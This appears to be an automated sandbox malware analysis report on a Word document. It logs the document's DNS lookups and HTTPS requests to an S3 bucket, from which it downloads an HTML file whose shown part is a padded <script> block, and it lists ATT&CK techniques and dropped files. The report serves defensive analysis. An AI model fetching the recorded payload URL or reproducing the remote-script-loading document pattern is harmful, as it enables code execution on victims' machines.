Aug 18, 2022 01:55:42.606504917 CEST	53	58836	8.8.8.8	192.168.2.22
Aug 18, 2022 01:55:48.337165117 CEST	50134	53	192.168.2.22	8.8.8.8
Aug 18, 2022 01:55:48.356043100 CEST	53	50134	8.8.8.8	192.168.2.22
Aug 18, 2022 01:55:48.358426094 CEST	55275	53	192.168.2.22	8.8.8.8
Aug 18, 2022 01:55:48.380167007 CEST	53	55275	8.8.8.8	192.168.2.22
Aug 18, 2022 01:55:50.260698080 CEST	59915	53	192.168.2.22	8.8.8.8
Aug 18, 2022 01:55:50.282433987 CEST	53	59915	8.8.8.8	192.168.2.22
Aug 18, 2022 01:55:50.285867929 CEST	54408	53	192.168.2.22	8.8.8.8
Aug 18, 2022 01:55:50.302962065 CEST	53	54408	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 18, 2022 01:55:36.086070061 CEST	192.168.2.22	8.8.8.8	0xbf6d	Standard query (0)	sqdocs.s3.eu-west-2.amazonaws.com	A (IP address)	IN (0x0001)
Aug 18, 2022 01:55:42.564024925 CEST	192.168.2.22	8.8.8.8	0xc1d2	Standard query (0)	sqdocs.s3.eu-west-2.amazonaws.com	A (IP address)	IN (0x0001)
Aug 18, 2022 01:55:42.586708069 CEST	192.168.2.22	8.8.8.8	0xfa76	Standard query (0)	sqdocs.s3.eu-west-2.amazonaws.com	A (IP address)	IN (0x0001)
Aug 18, 2022 01:55:48.337165117 CEST	192.168.2.22	8.8.8.8	0xf2ca	Standard query (0)	sqdocs.s3.eu-west-2.amazonaws.com	A (IP address)	IN (0x0001)
Aug 18, 2022 01:55:48.358426094 CEST	192.168.2.22	8.8.8.8	0xdc64	Standard query (0)	sqdocs.s3.eu-west-2.amazonaws.com	A (IP address)	IN (0x0001)
Aug 18, 2022 01:55:50.260698080 CEST	192.168.2.22	8.8.8.8	0x2c12	Standard query (0)	sqdocs.s3.eu-west-2.amazonaws.com	A (IP address)	IN (0x0001)
Aug 18, 2022 01:55:50.285867929 CEST	192.168.2.22	8.8.8.8	0xb92a	Standard query (0)	sqdocs.s3.eu-west-2.amazonaws.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 18, 2022 01:55:36.106134892 CEST	8.8.8.8	192.168.2.22	0xbf6d	No error (0)	sqdocs.s3.eu-west-2.amazonaws.com	s3-r-w.eu-west-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Aug 18, 2022 01:55:36.106134892 CEST	8.8.8.8	192.168.2.22	0xbf6d	No error (0)	s3-r-w.eu-west-2.amazonaws.com		3.5.244.102	A (IP address)	IN (0x0001)
Aug 18, 2022 01:55:42.583273888 CEST	8.8.8.8	192.168.2.22	0xc1d2	No error (0)	sqdocs.s3.eu-west-2.amazonaws.com	s3-r-w.eu-west-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Aug 18, 2022 01:55:42.583273888 CEST	8.8.8.8	192.168.2.22	0xc1d2	No error (0)	s3-r-w.eu-west-2.amazonaws.com		3.5.246.192	A (IP address)	IN (0x0001)
Aug 18, 2022 01:55:42.606504917 CEST	8.8.8.8	192.168.2.22	0xfa76	No error (0)	sqdocs.s3.eu-west-2.amazonaws.com	s3-r-w.eu-west-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Aug 18, 2022 01:55:42.606504917 CEST	8.8.8.8	192.168.2.22	0xfa76	No error (0)	s3-r-w.eu-west-2.amazonaws.com		52.95.148.114	A (IP address)	IN (0x0001)
Aug 18, 2022 01:55:48.356043100 CEST	8.8.8.8	192.168.2.22	0xf2ca	No error (0)	sqdocs.s3.eu-west-2.amazonaws.com	s3-r-w.eu-west-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Aug 18, 2022 01:55:48.356043100 CEST	8.8.8.8	192.168.2.22	0xf2ca	No error (0)	s3-r-w.eu-west-2.amazonaws.com		3.5.246.154	A (IP address)	IN (0x0001)
Aug 18, 2022 01:55:48.380167007 CEST	8.8.8.8	192.168.2.22	0xdc64	No error (0)	sqdocs.s3.eu-west-2.amazonaws.com	s3-r-w.eu-west-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Aug 18, 2022 01:55:48.380167007 CEST	8.8.8.8	192.168.2.22	0xdc64	No error (0)	s3-r-w.eu-west-2.amazonaws.com		52.95.149.186	A (IP address)	IN (0x0001)
Aug 18, 2022 01:55:50.282433987 CEST	8.8.8.8	192.168.2.22	0x2c12	No error (0)	sqdocs.s3.eu-west-2.amazonaws.com	s3-r-w.eu-west-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Aug 18, 2022 01:55:50.282433987 CEST	8.8.8.8	192.168.2.22	0x2c12	No error (0)	s3-r-w.eu-west-2.amazonaws.com		52.95.148.170	A (IP address)	IN (0x0001)
Aug 18, 2022 01:55:50.302962065 CEST	8.8.8.8	192.168.2.22	0xb92a	No error (0)	sqdocs.s3.eu-west-2.amazonaws.com	s3-r-w.eu-west-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Aug 18, 2022 01:55:50.302962065 CEST	8.8.8.8	192.168.2.22	0xb92a	No error (0)	s3-r-w.eu-west-2.amazonaws.com		52.95.148.86	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

sqdocs.s3.eu-west-2.amazonaws.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49173	3.5.244.102	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Direction	Data
2022-08-17 23:55:36 UTC	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: sqdocs.s3.eu-west-2.amazonaws.com Content-Length: 0 Connection: Keep-Alive
2022-08-17 23:55:36 UTC	IN	HTTP/1.1 400 Bad Request x-amz-request-id: RHS7B6YR8BDM8B4T x-amz-id-2: DElPklrCuWkN/htFteGxDCUK83TAHZJ2aKQcH5oAj/xqcZAWMp9yyxpwPI/QujZXMFYT5Km9KHA/7vH3D30GmA== Content-Type: application/xml Transfer-Encoding: chunked Date: Wed, 17 Aug 2022 23:55:35 GMT Server: AmazonS3 Connection: close
2022-08-17 23:55:36 UTC	IN	Data Raw: 31 32 37 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 42 61 64 52 65 71 75 65 73 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 49 6e 73 75 66 66 69 63 69 65 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 20 4f 72 69 67 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 20 6e 65 65 64 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 52 48 53 37 42 36 59 52 38 42 44 4d 38 42 34 54 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 44 45 6c 50 6b 6c 72 43 75 57 6b 4e 2f 68 74 46 74 65 47 78 44 43 55 4b 38 33 54 41 48 5a 4a 32 61 4b 51 63 48 35 6f 41 6a 2f 78 71 63 5a 41 57 4d 70 39 79 79 78 70 77 50 49 2f 51 Data Ascii: 127<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>RHS7B6YR8BDM8B4T</RequestId><HostId>DElPklrCuWkN/htFteGxDCUK83TAHZJ2aKQcH5oAj/xqcZAWMp9yyxpwPI/Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49174	3.5.246.192	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-17 23:55:42 UTC	0	OUT	HEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: sqdocs.s3.eu-west-2.amazonaws.com
2022-08-17 23:55:42 UTC	0	IN	HTTP/1.1 200 OK x-amz-id-2: E5rvYEiyOQm0FTaENo1YhYJraWpOA03oLIy3ud4RKhcSD6zZM+v/w/XXjYvCOZOhukvsbAlCsuuz2T5p5s4V0Q== x-amz-request-id: 0CCK2Q0QFXAVZMCC Date: Wed, 17 Aug 2022 23:55:43 GMT Last-Modified: Sat, 28 May 2022 14:15:08 GMT ETag: "bfbfa8fdda62476690c9077946372eaa" x-amz-meta-sha256: a353db4cfd64f1876f3f99be6481189dbf5e770d71b8d03cba84ff551edbcdc6 x-amz-meta-s3b-last-modified: 20220528T141455Z Accept-Ranges: bytes Content-Type: text/html Server: AmazonS3 Content-Length: 6837 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49179	3.5.244.102	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-17 23:55:49 UTC	1	OUT	GET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: sqdocs.s3.eu-west-2.amazonaws.com Connection: Keep-Alive
2022-08-17 23:55:49 UTC	1	IN	HTTP/1.1 200 OK x-amz-id-2: AJU2/Efdf/ivYvpHvwKH/lpY+X3xQmprHbpbh/VVXF/y9r2IIZiiWiZBlB0MRRcStW8/1hpd5W4om9a8Oj/epg== x-amz-request-id: 0J99H67S6JQ8C1PK Date: Wed, 17 Aug 2022 23:55:50 GMT Last-Modified: Sat, 28 May 2022 14:15:08 GMT ETag: "bfbfa8fdda62476690c9077946372eaa" x-amz-meta-sha256: a353db4cfd64f1876f3f99be6481189dbf5e770d71b8d03cba84ff551edbcdc6 x-amz-meta-s3b-last-modified: 20220528T141455Z Accept-Ranges: bytes Content-Type: text/html Server: AmazonS3 Content-Length: 6837 Connection: close
2022-08-17 23:55:49 UTC	2	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 Data Ascii: <!doctype
2022-08-17 23:55:49 UTC	2	IN	Data Raw: 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 Data Ascii: html><html lang="en"><body><script>//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AA

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49180	3.5.244.102	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-17 23:55:49 UTC	9	OUT	HEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: sqdocs.s3.eu-west-2.amazonaws.com Content-Length: 0 Connection: Keep-Alive
2022-08-17 23:55:49 UTC	9	IN	HTTP/1.1 200 OK x-amz-id-2: 0CNhKHXhJEGfEcJTugIxgev9axLf2muCQl4pvyVJCcbDGVK3GfLDo86OdWLHl5r2cRvpaoETvYjD1yL9ILUuDg== x-amz-request-id: 0J90S5QYHBPHA47S Date: Wed, 17 Aug 2022 23:55:50 GMT Last-Modified: Sat, 28 May 2022 14:15:08 GMT ETag: "bfbfa8fdda62476690c9077946372eaa" x-amz-meta-sha256: a353db4cfd64f1876f3f99be6481189dbf5e770d71b8d03cba84ff551edbcdc6 x-amz-meta-s3b-last-modified: 20220528T141455Z Accept-Ranges: bytes Content-Type: text/html Server: AmazonS3 Content-Length: 6837 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49181	3.5.244.102	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-17 23:55:49 UTC	9	OUT	HEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: sqdocs.s3.eu-west-2.amazonaws.com Content-Length: 0 Connection: Keep-Alive
2022-08-17 23:55:50 UTC	9	IN	HTTP/1.1 200 OK x-amz-id-2: WetO+94sTi2jjSPZ4SdsUUpjnowQpXc2ldt3Tf+5HSyKP/Y2kIpEo8+/pslunriOu0nsp83alh6YfcYcA2rgmw== x-amz-request-id: 0J91C3DHTQN67QPQ Date: Wed, 17 Aug 2022 23:55:50 GMT Last-Modified: Sat, 28 May 2022 14:15:08 GMT ETag: "bfbfa8fdda62476690c9077946372eaa" x-amz-meta-sha256: a353db4cfd64f1876f3f99be6481189dbf5e770d71b8d03cba84ff551edbcdc6 x-amz-meta-s3b-last-modified: 20220528T141455Z Accept-Ranges: bytes Content-Type: text/html Server: AmazonS3 Content-Length: 6837 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49182	3.5.244.102	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-17 23:55:50 UTC	10	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: sqdocs.s3.eu-west-2.amazonaws.com Content-Length: 0 Connection: Keep-Alive
2022-08-17 23:55:50 UTC	10	IN	HTTP/1.1 400 Bad Request x-amz-request-id: 3S0XNX0VQZYG8R8G x-amz-id-2: BnnoC48SFXJ6AIHnl2aKsHzFVB8raCJ1wR1NU4aCI3BbxlSBEoe9JMUupbdZg4AwIW+bXPIsiIYgZ+WQBzb2SQ== Content-Type: application/xml Transfer-Encoding: chunked Date: Wed, 17 Aug 2022 23:55:50 GMT Server: AmazonS3 Connection: close
2022-08-17 23:55:50 UTC	10	IN	Data Raw: 31 32 37 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 42 61 64 52 65 71 75 65 73 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 49 6e 73 75 66 66 69 63 69 65 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 20 4f 72 69 67 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 20 6e 65 65 64 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 33 53 30 58 4e 58 30 56 51 5a 59 47 38 52 38 47 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 42 6e 6e 6f 43 34 38 53 46 58 4a 36 41 49 48 6e 6c 32 61 4b 73 48 7a 46 56 42 38 72 61 43 4a 31 77 52 31 4e 55 34 61 43 49 33 42 62 78 6c 53 42 45 6f 65 39 4a 4d 55 75 70 62 64 5a Data Ascii: 127<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>3S0XNX0VQZYG8R8G</RequestId><HostId>BnnoC48SFXJ6AIHnl2aKsHzFVB8raCJ1wR1NU4aCI3BbxlSBEoe9JMUupbdZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.22	49183	52.95.148.170	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-17 23:55:50 UTC	11	OUT	HEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: sqdocs.s3.eu-west-2.amazonaws.com
2022-08-17 23:55:50 UTC	11	IN	HTTP/1.1 200 OK x-amz-id-2: Im/g8JKdO4f5LOXc1S1+MU81qxpQ94sWRjqEFDRGEZTsoLcwq3pufwP2QPGC4d6CWxjJ8VPOcWs= x-amz-request-id: 3S0GJJDAPVB2SV9Y Date: Wed, 17 Aug 2022 23:55:51 GMT Last-Modified: Sat, 28 May 2022 14:15:08 GMT ETag: "bfbfa8fdda62476690c9077946372eaa" x-amz-meta-sha256: a353db4cfd64f1876f3f99be6481189dbf5e770d71b8d03cba84ff551edbcdc6 x-amz-meta-s3b-last-modified: 20220528T141455Z Accept-Ranges: bytes Content-Type: text/html Server: AmazonS3 Content-Length: 6837 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.22	49184	3.5.244.102	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-17 23:55:50 UTC	11	OUT	GET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: sqdocs.s3.eu-west-2.amazonaws.com If-Modified-Since: Sat, 28 May 2022 14:15:08 GMT If-None-Match: "bfbfa8fdda62476690c9077946372eaa" Connection: Keep-Alive
2022-08-17 23:55:50 UTC	12	IN	HTTP/1.1 304 Not Modified x-amz-id-2: aSItQMjotTTyq+fVFeaHFodv1BtwQRQGpCc8zMwQ5RvRrOOZNSsM5beSbwzXwOo+eXASE2yjQMsdbj6fDcq5JA== x-amz-request-id: 3S0RJQASRVAJ87S3 Date: Wed, 17 Aug 2022 23:55:51 GMT Last-Modified: Sat, 28 May 2022 14:15:08 GMT ETag: "bfbfa8fdda62476690c9077946372eaa" x-amz-meta-sha256: a353db4cfd64f1876f3f99be6481189dbf5e770d71b8d03cba84ff551edbcdc6 x-amz-meta-s3b-last-modified: 20220528T141455Z Server: AmazonS3 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.22	49185	3.5.244.102	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-17 23:55:50 UTC	12	OUT	HEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: sqdocs.s3.eu-west-2.amazonaws.com Content-Length: 0 Connection: Keep-Alive
2022-08-17 23:55:50 UTC	12	IN	HTTP/1.1 200 OK x-amz-id-2: wv0j1d6pK64Sqgv1V+/Nnb7jG413feOaRoNBKjj1jOy8wgeAdqwgSmIcJI5uMe8dCuJZQWXV1zemcizDlbx6zg== x-amz-request-id: 3S0ZD17XJ2P6S18W Date: Wed, 17 Aug 2022 23:55:51 GMT Last-Modified: Sat, 28 May 2022 14:15:08 GMT ETag: "bfbfa8fdda62476690c9077946372eaa" x-amz-meta-sha256: a353db4cfd64f1876f3f99be6481189dbf5e770d71b8d03cba84ff551edbcdc6 x-amz-meta-s3b-last-modified: 20220528T141455Z Accept-Ranges: bytes Content-Type: text/html Server: AmazonS3 Content-Length: 6837 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.22	49186	3.5.244.102	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-17 23:55:51 UTC	13	OUT	HEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: sqdocs.s3.eu-west-2.amazonaws.com Content-Length: 0 Connection: Keep-Alive
2022-08-17 23:55:51 UTC	13	IN	HTTP/1.1 200 OK x-amz-id-2: SY1sqD1Gq92Ir9DeAr20BGjDxQB+cqIQEOHz6H4oXhsYBUiwKTdBZvK84RQKcHu87HgVtgVW2gd/nIitLtwM+g== x-amz-request-id: 8SSV3DPWGBGAFJKY Date: Wed, 17 Aug 2022 23:55:52 GMT Last-Modified: Sat, 28 May 2022 14:15:08 GMT ETag: "bfbfa8fdda62476690c9077946372eaa" x-amz-meta-sha256: a353db4cfd64f1876f3f99be6481189dbf5e770d71b8d03cba84ff551edbcdc6 x-amz-meta-s3b-last-modified: 20220528T141455Z Accept-Ranges: bytes Content-Type: text/html Server: AmazonS3 Content-Length: 6837 Connection: close

Target ID:	0
Start time:	01:55:14
Start date:	18/08/2022
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13ff90000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report icRTA4gcSe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{B11B56B7-FF16-4429-B914-E820C021DA19}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{7808CAC8-5245-4C0B-9091-621941B6E1B1}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E839A722.htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBAE70F4.htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{855EAE4E-7E59-44E5-8AE0-040E73EE4059}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{903BB447-6E72-4B36-901B-CD1D48C95A6E}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CFED663A-BFB4-4992-A74D-FB6645F47512}.tmp

C:\Users\user\AppData\Local\Temp\{5B541EB6-3011-4BB0-8233-8C3AF7CB0014}

C:\Users\user\AppData\Local\Temp\{9FEF270D-0727-481F-BD99-6F48A0D18A8D}

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\icRTA4gcSe.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\Desktop\~$RTA4gcSe.docx

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

Windows Analysis Report
icRTA4gcSe